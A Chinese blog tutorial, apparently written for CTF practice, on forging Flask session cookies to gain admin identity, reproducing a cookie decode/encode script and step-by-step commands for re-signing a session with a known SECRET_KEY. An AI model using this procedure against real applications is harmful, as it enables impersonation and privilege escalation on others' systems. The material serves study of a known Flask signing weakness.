flask session伪造admin身份

最新推荐文章于 2023-11-10 11:07:00 发布
最新推荐文章于 2023-11-10 11:07:00 发布
阅读量4k 收藏 21
点赞数 3
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/since_2020/article/details/119543172
版权

flask session 伪造

一、准备工作

需要先找是否有SECRET_KEY

python脚本可以把flask的session解密出来,但是如果想要加密伪造生成自己的session的话,还需要知道flask用来签名的SECRET_KEY

假设当前的SECRET_KEY是 ckj123

安装缺少的module

注意:
第一次弄的时候没有很多module,会报这样类似的错

ImportError: No module named ‘itsdangerous’

直接安装对应module

pip install itsdangerous

大佬的脚本

下载地址:
https://github.com/noraj/flask-session-cookie-manager

里面的flask_session_cookie_manager3.py

#!/usr/bin/env python3
""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'

# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast

# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else: # > 3.4
    from abc import ABC, abstractmethod

# Lib for argument parsing
import argparse

# external Imports
from flask.sessions import SecureCookieSessionInterface

class MockApp(object):

    def __init__(self, secret_key):
        self.secret_key = secret_key


if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
else: # > 3.4
    class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e


if __name__ == "__main__":
    # Args are only relevant for __main__ usage
    
    ## Description for help
    parser = argparse.ArgumentParser(
                description='Flask Session Cookie Decoder/Encoder',
                epilog="Author : Wilson Sumanang, Alexandre ZANNI")

    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')

    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=True)
    parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                                help='Session cookie structure', required=True)

    ## create the parser for the decode command
    parser_decode = subparsers.add_parser('decode', help='decode')
    parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=False)
    parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                                help='Session cookie value', required=True)

    ## get args
    args = parser.parse_args()

    ## find the option chosen
    if(args.subcommand == 'encode'):
        if(args.secret_key is not None and args.cookie_structure is not None):
            print(FSCM.encode(args.secret_key, args.cookie_structure))
    elif(args.subcommand == 'decode'):
        if(args.secret_key is not None and args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value,args.secret_key))
        elif(args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value))

二、脚本使用方法

脚本有解密、加密两种功能,具体用法如下
解密:python flask_session_manager.py decode -c -s # -c是flask cookie里的session值 -s参数是SECRET_KEY
加密:python flask_session_manager.py encode -s -t # -s参数是SECRET_KEY -t参数是session的参照格式,也就是session解密后的格式

解密

先注册一个账号,然后用这个账号登陆进去,找到当前账号的cookies的session值
然后在flask_session_cookie_manager3.py对于路径下面打开命令框

python flask_session_cookie_manager3.py decode -s “” -c “”

其中session值填在 -c 后面,SECRET_KEY填在 -s 后面
最后得到解密结果
image

加密

在解密的基础上,把name的地方改成admin,然后执行加密的命令

python flask_session_cookie_manager3.py encode -s “” -t “”

其中刚刚解密得到的东西填在 -t 后面,SECRET_KEY填在 -s 后面
得到加密结果
image

三、替换session值

最后再替换掉之前登陆成功页面的账号的cookies的session值,然后刷新页面

参考来源:
https://www.jianshu.com/p/f92311564ad0

white_&_black
关注
  • 3
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Flask-Session-Cookie-Manager: 简化Flask应用中的会话与Cookie管理
gitblog_00015的博客
04-16 419
Flask-Session-Cookie-Manager: 简化Flask应用中的会话与Cookie管理 项目地址:https://gitcode.com/noraj/flask-session-cookie-manager Flask-Session-Cookie-Manager 是一个基于Python Flask框架的扩展库,它为开发者提供了一种简单、直观的方式来管理和操作应用中的会话和Coo...
实现session身份认证机制
03-14
`session`身份认证机制是常用的一种方法,它用于在用户登录后维护用户的会话状态,确保用户在多个请求之间保持登录状态。在这个主题中,我们将深入探讨如何使用Node.js的Express框架以及cookie来实现session身份认证...
flask-session-cookie-managerFlask会话Cookie解码器
02-05
Flask Session Cookie解码器/编码器 原作者: 修复和改进作者: 从导入 依赖 Python 2或Python 3 安装 包 BlackArch Linux # pacman -S flask-session-cookie-manager{3,2} 吉特 ArchLinux 两者python3 etn python2: $ git clone https://github.com/noraj/flask-session-cookie-manager.git && cd flask-session-cookie-manager # makepkg -sic 其他
Flask中的session伪造
m0_60716947的博客
10-18 1135
flasksession伪造
flask session伪造
最新发布
shao65308的专栏
11-10 141
修改为:{'is_admin': True, 'name': 'admin', 'user_id': 1}生成所有可能的secre_key文件。爆破是用了哪个secre_key。把生成的字符串替换Cookie值。
Flask-session用法
qq_53142368的博客
06-07 1663
首先还是先从概念入手,最近学习越学越来越觉得自己菜 Flask-session: 概念: session咱们都知道是基于cookjie实现的,保存在服务器的键值对,同时在浏览器的cookie中也会保存相同的随机字符串,用来再次请求时拿出来,进行验证。 注意:Flask中的session是保存在浏览器中的,默认的key是session(加密的cookie),当然也可以将其保存在数据库中 flask中有一个session对象,它允许你在不同请求间存储特定用户的信息。它是在cookie的基础上实现的,并且对c
Django遇到的坑!ModuleNotFoundError: No module named 'itsdangerous'
qq_42550302的博客
04-20 4335
Django3.0 Python 3.6.5 ModuleNotFoundError: No module named ‘itsdangerous’ 总是显示这个错误,pip uninstall itsdangerous ;pip install itsdangerous都试了几次,还是不行。 明明我venv里有这个包,刚开始还以为没在虚拟环境里边打开,反反复复检查,明明在测试模块这里是没有问题的...
BUUCTF中web方向题目记录(二)
热门推荐
wanan的博客
10-06 4万+
BUUCTF中web方向题目记录(二)
php_users_admin_session.rar_admin session_php 用户管理
09-24
标题中的"php_users_admin_session.rar_admin session_php 用户管理"表明这是一个关于PHP编程中用户管理和会话(session)处理的资源包。这个压缩包包含了多个PHP脚本和一个数据库结构文档,用于实现一个多用户管理...
Asp.Net Core中基于Session身份验证的实现
10-18
在Asp.Net Core中,基于Session身份验证是一种传统的身份验证机制,尽管在Asp.Net Core中推荐使用更高级的如JWT(JSON Web Tokens)或Cookie身份验证,但有些情况下开发者仍可能选择使用Session。以下是对Asp.Net ...
php跨域提交及伪造SeSSION
09-25
在PHP编程中,跨域(Cross-Origin)和伪造SESSIONSession Hijacking)是两个重要的安全概念,它们都与Web应用程序的安全性密切相关。本篇文章将详细解释这两个概念,并提供相关的解决方案和预防措施。 首先,让...
flask-session-cookie-manager-master.zip
08-14
众所周知,flasksession是存储在客户端cookie中的,而且flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,简单的来说就是flasksession具有防伪造性,但是没有加密性,所以我们可以将flasksession进行解码和编码。
PyPI 官网下载 | flask-session-cookie-manager-1.2.1.tar.gz
01-31
资源来自pypi官网。 资源全名:flask-session-cookie-manager-1.2.1.tar.gz
flask-session-cookie-manager
01-29
使用python脚本更改或生成cookie
C语言头文件 SESSION
06-13
C语言头文件 SESSIONC语言头文件 SESSIONC语言头文件 SESSIONC语言头文件 SESSIONC语言头文件 SESSIONC语言头文件 SESSIONC语言头文件 SESSIONC语言头文件 SESSIONC语言头文件 SESSIONC语言头文件 SESSIONC语言...
FlaskCookieSession用法详解
IT之一小佬的博客
08-09 1268
FlaskCookieSession用法详解
ModuleNotFoundError: No module named ‘flask._compat‘
weixin_42000303的博客
07-28 851
flask-script报错:ModuleNotFoundError: No module named 'flask._compat' 的解决方法
flask session cookie
JackLiu16的博客
09-09 831
  flask sessioncookie信息是存储在客服端的,减少了服务端的压力。验证:(或者直接用curl不带参数请求) 1、请求/set    当服务端设置session通过cookie返回给浏览器后,浏览器保存cookies,并在下次/get请求带上cookie,服务器拿到浏览器传来的cookie,解析出之前设置在session中的信息。得到k1这个key的值v1,返回给浏览器 ...
postman伪造session
09-12
在使用Postman进行接口测试时,可以通过在Headers中添加Cookie伪造Session。具体步骤如下: 1. 打开接口文档,找到要测试的接口,并查看是否需要登录和身份验证。 2. 如果需要登录和身份验证,在Headers中配置请求头信息。其中,Cookie是验证身份的重要依据,需要将Cookie信息填入Headers中。 3. 将Cookie信息填入Headers tab下,如有其他Header参数信息,也需要填入。 4. 点击发送(Send)按钮,观察响应是否符合预期。 通过以上步骤,你可以在Postman中伪造Session来进行接口测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值